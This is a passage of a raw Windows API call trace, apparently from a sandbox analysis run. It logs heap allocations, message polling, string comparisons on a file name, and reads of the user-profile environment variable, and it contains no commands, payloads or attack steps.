wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0149.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0149.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0149.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0149.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0149.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0149.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0149.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0149.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0149.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pvmhff.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vmhff.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mhff.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hff.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ff.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0149.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0149.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0149.668] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0149.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0149.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0149.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0149.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0149.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0149.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0149.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0149.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0149.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0149.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0149.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0149.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f7040 [0149.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0149.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pvmhff.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vmhff.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mhff.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hff.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ff.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0149.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0149.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0149.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0149.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0149.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0149.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a698b0 | out: hHeap=0x2af0000) returned 1 [0149.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0149.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.669] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0149.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0149.669] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0149.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0149.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0149.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0149.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0149.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0149.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0149.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0149.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0149.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0149.670] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0149.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0149.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0149.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0149.670] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0149.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0149.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0149.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0149.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0149.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0149.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0149.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0149.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0149.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0149.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0149.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0149.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0149.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0149.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0149.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0149.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0149.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0149.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0149.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0149.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0149.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0149.672] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0149.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0149.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0149.672] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0149.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0149.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0149.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0149.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0149.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0149.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0149.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0149.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0149.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0149.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0149.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0149.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0149.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0149.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0149.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0149.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72288 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722c8 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0149.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0149.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0149.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0149.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0149.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0149.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0149.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0149.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0149.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0149.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0149.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0149.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0149.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0149.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0149.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0149.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0149.674] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0149.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0149.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0149.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0149.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0149.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0149.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0149.674] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0149.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0149.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0149.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0149.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0149.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0149.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0149.675] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0149.675] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0149.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0149.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0149.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0149.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 